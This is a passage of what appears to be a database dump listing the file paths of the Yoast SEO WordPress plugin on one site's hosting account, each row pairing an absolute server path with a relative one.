(1190, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/filter-explanation.js', 'wp-content/plugins/wordpress-seo/js/dist/filter-explanation.js'),
(1191, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/first-time-configuration.js', 'wp-content/plugins/wordpress-seo/js/dist/first-time-configuration.js'),
(1192, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/frontend-inspector-resources.js', 'wp-content/plugins/wordpress-seo/js/dist/frontend-inspector-resources.js'),
(1193, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/help-scout-beacon.js', 'wp-content/plugins/wordpress-seo/js/dist/help-scout-beacon.js'),
(1194, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/import.js', 'wp-content/plugins/wordpress-seo/js/dist/import.js'),
(1195, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/indexation.js', 'wp-content/plugins/wordpress-seo/js/dist/indexation.js'),
(1196, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/installation-success.js', 'wp-content/plugins/wordpress-seo/js/dist/installation-success.js'),
(1197, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/integrations-page.js', 'wp-content/plugins/wordpress-seo/js/dist/integrations-page.js'),
(1198, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/introductions.js', 'wp-content/plugins/wordpress-seo/js/dist/introductions.js'),
(1199, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/ar.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/ar.js'),
(1200, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/ca.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/ca.js'),
(1201, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/cs.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/cs.js'),
(1202, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/de.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/de.js'),
(1203, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/default.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/default.js'),
(1204, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/el.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/el.js'),
(1205, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/en.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/en.js'),
(1206, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/es.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/es.js'),
(1207, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/fa.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/fa.js'),
(1208, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/fr.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/fr.js'),
(1209, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/he.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/he.js'),
(1210, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/hu.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/hu.js'),
(1211, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/id.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/id.js'),
(1212, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/it.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/it.js'),
(1213, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/ja.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/ja.js'),
(1214, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/nb.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/nb.js'),
(1215, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/nl.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/nl.js'),
(1216, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/pl.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/pl.js'),
(1217, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/pt.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/pt.js'),
(1218, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/ru.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/ru.js'),
(1219, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/sk.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/sk.js'),
(1220, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/sv.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/sv.js'),
(1221, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/tr.js', 'wp-content/plugins/wordpress-seo/js/dist/languages/tr.js'),
(1222, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/network-admin.js', 'wp-content/plugins/wordpress-seo/js/dist/network-admin.js'),
(1223, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/new-settings.js', 'wp-content/plugins/wordpress-seo/js/dist/new-settings.js'),
(1224, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/post-edit.js', 'wp-content/plugins/wordpress-seo/js/dist/post-edit.js'),
(1225, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/quick-edit-handler.js', 'wp-content/plugins/wordpress-seo/js/dist/quick-edit-handler.js'),
(1226, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/react-select.js', 'wp-content/plugins/wordpress-seo/js/dist/react-select.js'),
(1227, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/redirect-old-features-tab.js', 'wp-content/plugins/wordpress-seo/js/dist/redirect-old-features-tab.js'),
(1228, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/reindex-links.js', 'wp-content/plugins/wordpress-seo/js/dist/reindex-links.js'),
(1229, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/settings.js', 'wp-content/plugins/wordpress-seo/js/dist/settings.js'),
(1230, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/structured-data-blocks.js', 'wp-content/plugins/wordpress-seo/js/dist/structured-data-blocks.js'),
(1231, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/support.js', 'wp-content/plugins/wordpress-seo/js/dist/support.js'),
(1232, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/term-edit.js', 'wp-content/plugins/wordpress-seo/js/dist/term-edit.js'),
(1233, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/used-keywords-assessment.js', 'wp-content/plugins/wordpress-seo/js/dist/used-keywords-assessment.js'),
(1234, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/wincher-dashboard-widget.js', 'wp-content/plugins/wordpress-seo/js/dist/wincher-dashboard-widget.js'),
(1235, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/wordproof-uikit.js', 'wp-content/plugins/wordpress-seo/js/dist/wordproof-uikit.js'),
(1236, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/workouts.js', 'wp-content/plugins/wordpress-seo/js/dist/workouts.js'),
(1237, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/lib/abstract-main.php', 'wp-content/plugins/wordpress-seo/lib/abstract-main.php'),
(1238, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/lib/dependency-injection/container-registry.php', 'wp-content/plugins/wordpress-seo/lib/dependency-injection/container-registry.php'),
(1239, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/lib/migrations/adapter.php', 'wp-content/plugins/wordpress-seo/lib/migrations/adapter.php'),
(1240, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/lib/migrations/column.php', 'wp-content/plugins/wordpress-seo/lib/migrations/column.php'),
(1241, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/lib/migrations/constants.php', 'wp-content/plugins/wordpress-seo/lib/migrations/constants.php'),
(1242, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/lib/migrations/migration.php', 'wp-content/plugins/wordpress-seo/lib/migrations/migration.php'),
(1243, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/lib/migrations/table.php', 'wp-content/plugins/wordpress-seo/lib/migrations/table.php'),
(1244, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/lib/model.php', 'wp-content/plugins/wordpress-seo/lib/model.php'),
(1245, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/lib/orm.php', 'wp-content/plugins/wordpress-seo/lib/orm.php'),
(1246, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/license.txt', 'wp-content/plugins/wordpress-seo/license.txt'),
(1247, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/Yoast_SEO_Icon.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/Yoast_SEO_Icon.svg'),
(1248, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/Yoast_icon_kader.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/Yoast_icon_kader.svg'),
(1249, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/algolia-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/algolia-logo.svg'),
(1250, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/connection-assistant.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/connection-assistant.svg'),
(1251, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/edd-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/edd-logo.svg'),
(1252, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/elementor-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/elementor-logo.svg'),
(1253, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/g2_logo_white_optm.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/g2_logo_white_optm.svg'),
(1254, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/icon-arrow-down.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/icon-arrow-down.svg'),
(1255, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/icon-facebook.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/icon-facebook.svg'),
(1256, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/icon-twitter.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/icon-twitter.svg'),
(1257, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/indexables_1_left_bubble_optm.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/indexables_1_left_bubble_optm.svg'),
(1258, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/indexables_2_left_bubble_optm.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/indexables_2_left_bubble_optm.svg'),
(1259, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/jetpack-boost-integration-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/jetpack-boost-integration-logo.svg'),
(1260, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/jetpack-boost-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/jetpack-boost-logo.svg'),
(1261, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/jetpack-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/jetpack-logo.svg'),
(1262, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/logo-g2-white.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/logo-g2-white.svg'),
(1263, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/mastodon-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/mastodon-logo.svg'),
(1264, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/motivated_bubble_woman_1_optim.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/motivated_bubble_woman_1_optim.svg'),
(1265, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/semrush-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/semrush-logo.svg'),
(1266, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/ssp-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/ssp-logo.svg'),
(1267, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/star-rating-half.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/star-rating-half.svg'),
(1268, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/star-rating-star.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/star-rating-star.svg'),
(1269, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/succes_marieke_bubble_optm.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/succes_marieke_bubble_optm.svg'),
(1270, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/tec-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/tec-logo.svg'),
(1271, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/wincher-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/wincher-logo.svg'),
(1272, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/woocommerce-seo-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/woocommerce-seo-logo.svg'),
(1273, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/wordproof-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/wordproof-logo.svg'),
(1274, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/wp-recipe-maker-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/wp-recipe-maker-logo.svg'),
(1275, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/yoast-seo-simple-logo.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/yoast-seo-simple-logo.svg'),
(1276, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/packages/js/images/yoast_loading_spinner.svg', 'wp-content/plugins/wordpress-seo/packages/js/images/yoast_loading_spinner.svg'),
(1277, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/readme.txt', 'wp-content/plugins/wordpress-seo/readme.txt'),
(1278, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/addon-installation/addon-activate-action.php', 'wp-content/plugins/wordpress-seo/src/actions/addon-installation/addon-activate-action.php'),
(1279, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/addon-installation/addon-install-action.php', 'wp-content/plugins/wordpress-seo/src/actions/addon-installation/addon-install-action.php'),
(1280, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/alert-dismissal-action.php', 'wp-content/plugins/wordpress-seo/src/actions/alert-dismissal-action.php'),
(1281, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/configuration/first-time-configuration-action.php', 'wp-content/plugins/wordpress-seo/src/actions/configuration/first-time-configuration-action.php'),
(1282, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/abstract-aioseo-importing-action.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/abstract-aioseo-importing-action.php'),
(1283, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/abstract-aioseo-settings-importing-action.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/abstract-aioseo-settings-importing-action.php'),
(1284, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-cleanup-action.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-cleanup-action.php'),
(1285, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-custom-archive-settings-importing-action.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-custom-archive-settings-importing-action.php'),
(1286, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-default-archive-settings-importing-action.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-default-archive-settings-importing-action.php'),
(1287, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-general-settings-importing-action.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-general-settings-importing-action.php'),
(1288, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-posts-importing-action.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-posts-importing-action.php'),
(1289, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-posttype-defaults-settings-importing-action.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-posttype-defaults-settings-importing-action.php'),
(1290, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-taxonomy-settings-importing-action.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-taxonomy-settings-importing-action.php'),
(1291, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-validate-data-action.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/aioseo/aioseo-validate-data-action.php'),
(1292, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/deactivate-conflicting-plugins-action.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/deactivate-conflicting-plugins-action.php'),
(1293, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/importing-action-interface.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/importing-action-interface.php'),
(1294, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/importing/importing-indexation-action-interface.php', 'wp-content/plugins/wordpress-seo/src/actions/importing/importing-indexation-action-interface.php'),
(1295, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexables/indexable-head-action.php', 'wp-content/plugins/wordpress-seo/src/actions/indexables/indexable-head-action.php'),
(1296, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/abstract-indexing-action.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/abstract-indexing-action.php'),
(1297, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/abstract-link-indexing-action.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/abstract-link-indexing-action.php'),
(1298, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-general-indexation-action.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-general-indexation-action.php'),
(1299, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-indexing-complete-action.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-indexing-complete-action.php'),
(1300, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-post-indexation-action.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-post-indexation-action.php'),
(1301, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-post-type-archive-indexation-action.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-post-type-archive-indexation-action.php'),
(1302, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-term-indexation-action.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/indexable-term-indexation-action.php'),
(1303, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/indexation-action-interface.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/indexation-action-interface.php'),
(1304, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/indexing-complete-action.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/indexing-complete-action.php'),
(1305, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/indexing-prepare-action.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/indexing-prepare-action.php'),
(1306, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/limited-indexing-action-interface.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/limited-indexing-action-interface.php'),
(1307, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/post-link-indexing-action.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/post-link-indexing-action.php'),
(1308, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/indexing/term-link-indexing-action.php', 'wp-content/plugins/wordpress-seo/src/actions/indexing/term-link-indexing-action.php'),
(1309, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/integrations-action.php', 'wp-content/plugins/wordpress-seo/src/actions/integrations-action.php'),
(1310, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-login-action.php', 'wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-login-action.php'),
(1311, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-options-action.php', 'wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-options-action.php'),
(1312, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-phrases-action.php', 'wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-phrases-action.php'),
(1313, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/wincher/wincher-account-action.php', 'wp-content/plugins/wordpress-seo/src/actions/wincher/wincher-account-action.php'),
(1314, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/wincher/wincher-keyphrases-action.php', 'wp-content/plugins/wordpress-seo/src/actions/wincher/wincher-keyphrases-action.php'),
(1315, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/actions/wincher/wincher-login-action.php', 'wp-content/plugins/wordpress-seo/src/actions/wincher/wincher-login-action.php'),
(1316, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/analytics/application/missing-indexables-collector.php', 'wp-content/plugins/wordpress-seo/src/analytics/application/missing-indexables-collector.php'),
(1317, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/analytics/application/to-be-cleaned-indexables-collector.php', 'wp-content/plugins/wordpress-seo/src/analytics/application/to-be-cleaned-indexables-collector.php'),
(1318, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/analytics/domain/missing-indexable-bucket.php', 'wp-content/plugins/wordpress-seo/src/analytics/domain/missing-indexable-bucket.php'),
(1319, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/analytics/domain/missing-indexable-count.php', 'wp-content/plugins/wordpress-seo/src/analytics/domain/missing-indexable-count.php'),
(1320, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/analytics/domain/to-be-cleaned-indexable-bucket.php', 'wp-content/plugins/wordpress-seo/src/analytics/domain/to-be-cleaned-indexable-bucket.php'),
(1321, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/analytics/domain/to-be-cleaned-indexable-count.php', 'wp-content/plugins/wordpress-seo/src/analytics/domain/to-be-cleaned-indexable-count.php'),
(1322, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/analytics/user-interface/last-completed-indexation-integration.php', 'wp-content/plugins/wordpress-seo/src/analytics/user-interface/last-completed-indexation-integration.php'),
(1323, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/builders/indexable-author-builder.php', 'wp-content/plugins/wordpress-seo/src/builders/indexable-author-builder.php'),
(1324, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/builders/indexable-builder.php', 'wp-content/plugins/wordpress-seo/src/builders/indexable-builder.php'),
(1325, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/builders/indexable-date-archive-builder.php', 'wp-content/plugins/wordpress-seo/src/builders/indexable-date-archive-builder.php'),
(1326, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/builders/indexable-hierarchy-builder.php', 'wp-content/plugins/wordpress-seo/src/builders/indexable-hierarchy-builder.php'),
(1327, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/builders/indexable-home-page-builder.php', 'wp-content/plugins/wordpress-seo/src/builders/indexable-home-page-builder.php'),
(1328, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/builders/indexable-link-builder.php', 'wp-content/plugins/wordpress-seo/src/builders/indexable-link-builder.php'),
(1329, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/builders/indexable-post-builder.php', 'wp-content/plugins/wordpress-seo/src/builders/indexable-post-builder.php'),
(1330, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/builders/indexable-post-type-archive-builder.php', 'wp-content/plugins/wordpress-seo/src/builders/indexable-post-type-archive-builder.php'),
(1331, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/builders/indexable-social-image-trait.php', 'wp-content/plugins/wordpress-seo/src/builders/indexable-social-image-trait.php'),
(1332, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/builders/indexable-system-page-builder.php', 'wp-content/plugins/wordpress-seo/src/builders/indexable-system-page-builder.php'),
(1333, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/builders/indexable-term-builder.php', 'wp-content/plugins/wordpress-seo/src/builders/indexable-term-builder.php'),
(1334, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/builders/primary-term-builder.php', 'wp-content/plugins/wordpress-seo/src/builders/primary-term-builder.php'),
(1335, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/commands/cleanup-command.php', 'wp-content/plugins/wordpress-seo/src/commands/cleanup-command.php'),
(1336, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/commands/command-interface.php', 'wp-content/plugins/wordpress-seo/src/commands/command-interface.php'),
(1337, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/commands/index-command.php', 'wp-content/plugins/wordpress-seo/src/commands/index-command.php'),
(1338, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/addon-installation-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/addon-installation-conditional.php'),
(1339, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/admin/doing-post-quick-edit-save-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/admin/doing-post-quick-edit-save-conditional.php'),
(1340, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/admin/estimated-reading-time-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/admin/estimated-reading-time-conditional.php'),
(1341, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/admin/licenses-page-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/admin/licenses-page-conditional.php'),
(1342, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/conditionals/admin/non-network-admin-conditional.php', 'wp-content/plugins/wordpress-seo/src/conditionals/admin/non-network-admin-conditional.php'),
